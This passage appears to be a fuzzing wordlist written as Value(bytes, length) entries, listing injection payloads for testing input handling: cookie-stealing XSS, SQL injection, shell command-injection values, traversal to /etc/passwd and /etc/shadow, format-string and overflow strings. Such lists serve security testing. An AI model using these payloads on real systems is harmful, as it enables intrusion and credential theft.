Value(b"<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>", 688),
Value(b"<IMG%20SRC='javasc\tript:alert(document.cookie)'>", 384),
Value(b"<IMG%20SRC='javascript:alert(document.cookie)'>", 376), Value(b'<foo></foo>', 88),
Value(b"<name>','')); phpinfo(); exit;/*</name>", 312),
Value(b'<script>alert("XSS")</script>', 232),
Value(b'<script>alert(document.cookie)</script>', 312),
Value(b'<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(\'XSS\')"></B></I></xml>'
b'<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml>'
b'<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', 1672),
Value(b'<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(\'XSS\');">]]>', 608),
Value(b'<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>', 688),
Value(b"<xss><script>alert('XSS')</script></vulnerable>", 376),
Value(b'<youremail>%0aBcc:<youremail>', 232), Value(b'<youremail>%0aCc:<youremail>', 224),
Value(b'<youremail>%0d%0aBcc:<youremail>', 256), Value(b'<youremail>%0d%0aCc:<youremail>', 248),
Value(b'=', 8), Value(b"='", 16), Value(b'=--', 24), Value(b'=;', 16), Value(b'>', 8),
Value(b'?x=', 24), Value(b'?x="', 32), Value(b'?x=>', 32), Value(b'?x=|', 32),
Value(b'@&apos;', 56), Value(b"@'", 16), Value(b'@*', 16), Value(b'@variable', 72), Value(b'A', 8),
Value(b'ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|', 520),
Value(b'FALSE', 40), Value(b'NULL', 32), Value(b'PRINT', 40), Value(b'PRINT @@variable', 128),
Value(b'TRUE', 32), Value(b'XXXXX.%p', 64), Value(b'XXXXX`perl -e \'print ".%p" x 80\'`', 264),
Value(b'[&apos;]', 64), Value(b"[']", 24), Value(b'\\', 8), Value(b'\\";alert(\'XSS\');//', 144),
Value(b'\\"blah', 48), Value(b'\\&apos;', 56), Value(b"\\'", 16),
Value(b'\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd', 328),
Value(b'\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd%00', 352),
Value(b'\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow', 328),
Value(b'\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow%00', 352), Value(b'\\0', 16),
Value(b'\\00', 24), Value(b'\\00\\00', 48), Value(b'\\00\\00\\00', 72), Value(b'\\0\\0', 32),
Value(b'\\0\\0\\0', 48), Value(b'\\\\', 16),
Value(b'\\\\&apos;/bin/cat%20/etc/passwd\\\\&apos;', 304),
Value(b'\\\\&apos;/bin/cat%20/etc/shadow\\\\&apos;', 304), Value(b'\\\\/', 24),
Value(b'\\\\\\\\*', 40), Value(b'\\\\\\\\?\\\\', 56), Value(b'\\n/bin/ls -al\\n', 120),
Value(b'\\n/usr/bin/id;', 112), Value(b'\\n/usr/bin/id\\n', 120), Value(b'\\n/usr/bin/id|', 112),
Value(b'\\nid;', 40), Value(b'\\nid\\n', 48), Value(b'\\nid|', 40),
Value(b'\\nnetstat -a%\\n', 120), Value(b'\\t', 16), Value(b'\\u003C', 48), Value(b'\\u003c', 48),
Value(b'\\x23', 32), Value(b'\\x27', 32), Value(b'\\x27UNION SELECT', 128),
Value(b'\\x27\\x4F\\x52 SELECT *', 168), Value(b'\\x27\\x6F\\x72 SELECT *', 168),
Value(b'\\x3C', 32), Value(b'\\x3D \\x27', 72), Value(b"\\x3D \\x3B'", 80), Value(b'\\x3c', 32),
Value(b'^&apos;', 56), Value(b"^'", 16), Value(b'`', 8), Value(b'`/usr/bin/id`', 104),
Value(b'`dir`', 40), Value(b'`id`', 32), Value(b'`perl -e \'print ".%p" x 80\'`%n', 240),
Value(b'`ping 127.0.0.1`', 128), Value(b'a);/usr/bin/id', 112), Value(b'a);/usr/bin/id;', 120),
Value(b'a);/usr/bin/id|', 120), Value(b'a);id', 40), Value(b'a);id;', 48), Value(b'a);id|', 48),
Value(b'a)|/usr/bin/id', 112), Value(b'a)|/usr/bin/id;', 120), Value(b'a)|id', 40),
Value(b'a)|id;', 48), Value(b'a;/usr/bin/id', 104), Value(b'a;/usr/bin/id;', 112),
Value(b'a;/usr/bin/id|', 112), Value(b'a;id', 32), Value(b'a;id;', 40), Value(b'a;id|', 40),
Value(b'http://<yourservername>/', 192), Value(b'id%00', 40), Value(b'id%00|', 48),
Value(b'insert', 48), Value(b'like', 32), Value(b'limit', 40), Value(b'null', 32), Value(b'or', 16),
Value(b'or 0=0 #', 64), Value(b'or 0=0 --', 72), Value(b'or 1=1--', 64), Value(b'or%201=1', 64),
Value(b'or%201=1 --', 88), Value(b'response.write 111111', 168), Value(b'something%00html', 128),
Value(b'update', 48), Value(b"x' or 1=1 or 'x'='y", 152),
Value(b"x' or name()='username' or 'x'='y", 264), Value(b'xsstest', 56),
Value(b'xsstest%00"<>\'', 112), Value(b'{'}', 64), Value(b'|/usr/bin/id', 96),
Value(b'|/usr/bin/id|', 104), Value(b'|id', 24), Value(b'|id;', 32), Value(b'|id|', 32),
Value(b'|ls', 24), Value(b'|ls -la', 56), Value(b'|nid\\n', 48), Value(b'|usr/bin/id\\n', 104),
Value(b'||', 16), Value(b'|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &', 424),
Value(b'||/usr/bin/id;', 112), Value(b'||/usr/bin/id|', 112), Value(b'}', 8),
Value(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',
80000),
Value(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
